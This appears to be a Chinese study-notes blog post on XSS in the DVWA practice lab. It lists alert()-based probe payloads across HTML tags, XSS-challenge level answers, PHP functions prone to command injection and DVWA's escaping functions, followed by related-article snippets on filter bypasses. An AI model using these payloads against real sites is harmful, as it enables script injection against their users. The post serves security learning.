学习dvwa中php代码与验证xss漏洞的标签

最新推荐文章于 2023-07-02 11:41:48 发布
最新推荐文章于 2023-07-02 11:41:48 发布
阅读量171 收藏
点赞数
文章标签: php 学习 xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tututuxhw/article/details/126756039
版权


     验证xss的标签
     1 script标签  <script>alert(1)</script>
     2 iframe标签  将一个HTML文档嵌入在一个HTML中显示   <Iframe src="URL"></iframe>
                                                       <iframe οnlοad=alert('xss')></iframe>
     3 a标签       <a href="javascript:alert(document.domain)">5</a >       
                    <a href="https://www.baidu.com/">百度一下</a>
     4 body标签    <body οnlοad=alert(1)>
     5 <button>标签   元素上点击鼠标时触发  
                    <button οnclick="alert(1)">test</button>  在test上点击鼠标触发
     6 p标签        <p οnmοusedοwn=alert(1)>test</p>   在test上按下鼠标触发
                    <p οnmοuseup=alert(1)>test</p>     在test上释放鼠标触发

     xss challenges   "><script>alert(document.domain)</script><
             第6关  <和>符号被转移   "οnclick=alert(document.domain)或者”οnmοuseοver=”alert(document.domain)
             第十关  domain被过滤 采用双写


      php常见的可能存在命令注入的函数
                  shell_exec   通过shell环境执行命令,并且将完整的输出以字符串的方式返回。
                  eval( )      用于对一个字符串以PHP语句方式解析运行
                  phpinfo( )       phpinfo( )会输出有关PHP信息的页面——运行的版本号,配置信息等等
                  call_user_func()   调用其他函数的功能,其中的一个参数作为要调用的函数名

     dvwa漏洞代码分析 
        预定义字符包括“\0”,“t”,“\n”,“\x0B”,“\r”,“ ”
        mysqli_real_escape_string(connection,escapestring)
                                 connection:要连接的MySQL数据库
                                 escapestring:要转义的字符串   x00,n,r,,’,”,x1a
        stripslashes()          删除字符串中的反斜杠。
        str_replace             替换
        strip_tags() 函数       剥去字符串中的HTML、XML以及PHP的标签。
        htmlspecialchars()函数  将()中的预定义字符转换成html实体。
        preg_replace            使用正则表达式将字符都过滤

  
     DOM型XSS 
                DOM是一个树状的模型,js可以对树中的文档对象进行修改,而改变页面的元素,dom型xss就是通过函数获取到输入的值,然后拼接到代码中,如果包含恶意代码,则当js代码执行去改变页面元素的时候会导致恶意代码被执行,从而发生xss。
 

巨型绿豆饼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA-安装-漏洞测试-漏洞修复指南.docx
05-17
DVWA-安装-漏洞测试-漏洞修复指南-需要安装 xpmpp或WampServer。
dvwa靶场,里面也有xss靶场
09-24
我的连接数据库用户名是root,密码是123456,自己的不一样的话,在DVWA-master\config目录下config.inc.php文件内修改自己的密码。
皮卡丘(pikachu) XSS三种类型举例
weixin_44787832的博客
07-22 3437
反射型xss(get) 首先输入 >'''<> 并提交,发现可以正常输出 查看源码 发现我们的输入全部输出到了p标签 之后我们输入payload: <script>alert("xss")</script> 发现输入框容不下这么长的数据 之后我们F12,去改maxlength的值 改完后我们的payload执行成功 查看源码,JS代码被浏览器执行 像这种GET型的XSS漏洞,一般可将含XSS的URL伪.
XSS 常用标签及绕过姿势总结
hackzkaq的博客
08-17 5117
A位置可填充 /,/123/,%09,%0A,%0C,%0D,%20 B位置可填充 %09,%0A,%0C,%0D,%20 C位置可填充 %0B,/**/,如果加了双引号,则可以填充 %09,%0A,%0C,%0D,%20 D位置可填充 %09,%0A,%0C,%0D,%20,//,>例如 javascript:alert(1) ,进行 Unicode 编码时,只能对 alert 和 “1” 进行编码,框号编码后会被当成文本字符,不能执行。...
pikachu的XSS
weixin_50339082的博客
07-19 324
XSS 反射型XSS(get) 来看一下pikachu平台上的反射型XSS漏洞. 1.根据测试流程先输入一组字符。返回提示并不知道。 2.来查看一下网络的源代码Ctrl+U。按住Ctrl+F找到刚才输入的字符。 3.尝试在输入框输入一段script的代码,首先我们使用火狐浏览器的插件将输入框可输入的字符串长度改长。然后在其输入一个script的代码添加一个警告框alert。 <script>alert("xss")</script> 反射型XSS(post) 1.在
php判断post是否xss,PHP实现表单提交数据的验证处理功能【防SQL注入和XSS攻击等】...
weixin_30767895的博客
03-10 232
本文实例讲述了PHP实现表单提交数据的验证处理功能。分享给大家供大家参考,具体如下:防XSS攻击代码:/*** 安全过滤函数** @param $string* @return string*/function safe_replace($string) {$string = str_replace('%20','',$string);$string = str_replace('%27','',...
php判断xss攻击
echojson的专栏
03-19 952
function isXss() 02.{ 03.$temp = strtoupper(urldecode(urldecode($_SERVER['REQUEST_URI']))); 04.if(strpos($temp, ') !== false || strpos($temp, '"') !== false || strpos($temp, 'CONTENT-TRAN
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
PHP-dvwa-高难度代码审计
最新发布
10-08
PHP-dvwa-高难度代码审计
135-PHP、Apache环境部署DVWA
09-08
135-PHP、Apache环境部署DVWA
PHP代码审计 XSS专题
goddemon
02-04 291
一,XSS反射型漏洞xss漏洞处 1.变量的直接输出 <?php echo $_GET['xss']; ?> 如cs.php存在的是上面的这个源码 http://127.0.0.1/cs.php?xss= 2.$_SERVER 变量参数 $_SERVER[‘PHP_SELF’] //直接在URL输出执行XSS $_SERVER[‘HTTP_USER_AGENT’] //HTTP头构造XSS $_SERVER[‘HTTP_REFERER’] //Referer头构造XSS $_
php 正则表达式获取html标签内容_PHP安全篇之XSS攻击
weixin_39729262的博客
12-03 165
什么是XSSphp安全之XSSXSS,全称Cross Site Scripting,即跨站脚本攻击,从某种意义上来讲也是一种注入攻击,具体指攻击者在页面注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器XSS可以分为存储型的XSS与反射型的XSS。什么是反射型...
php判断post是否xss,PHP 防GET\POST注入和XSS的两个函数方法
weixin_39517400的博客
03-10 194
function RemoveXSS($val) {// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed// this prevents some character re-spacing such as // note that you have to handle splits with...
PHP网页xss攻击测试用例,PHP web项目进行XSS漏洞测试存在的问题
weixin_32058239的博客
03-22 172
概念:跨站脚本攻击(XSS)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。我们可以将其分成三类:(1)反射型XSS: 攻击者事先制作好攻击链...
xss学习经历
Hack_Wen的博客
11-21 506
xss学习历程 1 由于最近对渗透测试的相关学习,了解了一些xss payload的一些方法,在这里总结一下, xss分类 首先,简单介绍一些xss攻击的类别,xss分为存储型,反射性,DOM型, XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的...
XSS(跨站脚本攻击)详解
hello
07-02 3500
XSS简述-XSS类型-XSS常用标签
Pikachu漏洞练习平台实验——XSS(二)
dishan4749253的博客
09-21 2508
概述 反射型XSS(get) XSS案例:盗取Cookie 反射型XSS(post) 存储型XSS XSS案例:钓鱼攻击 XSS案例:键盘记录 DOM型XSS DOM型XSS-X XSS之盲打 XSS之过滤 XSS之htmlspecialchars XSS常见防范措施 XSS之href输出 XSS之js输出 XSS常见Payload ...
【安全】P 4-6 标签属性XSS
Z_David_Z的博客
02-17 402
0X01 配置Chrome关闭XSS-Auditor https://xss-quiz.int21h.jp/ 利用XSS过程会出现下图情况。配置Chrome --args --disable-xss-auditor 0X02 属性XSS发现 技巧:ctrl+F 搜索特定字符串 0X03 属性XSS闭合引入script 闭合引号 尖括号,引入script脚本 “><script>alert(document.domain);</script> 0X04 属性
XSS漏洞-常见标签
weixin_61143354的博客
09-17 1544
网络安全笔记
dvwa利用xss漏洞绕过csrf漏洞
05-20
DVWA,可以使用以下步骤来利用XSS漏洞绕过CSRF漏洞: 1. 打开DVWA,进入CSRF页面。在这个页面上,你将需要创建一个新的帖子。 2. 在新帖子的标题,我们可以插入一段XSS代码,例如:`<script>document.forms...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值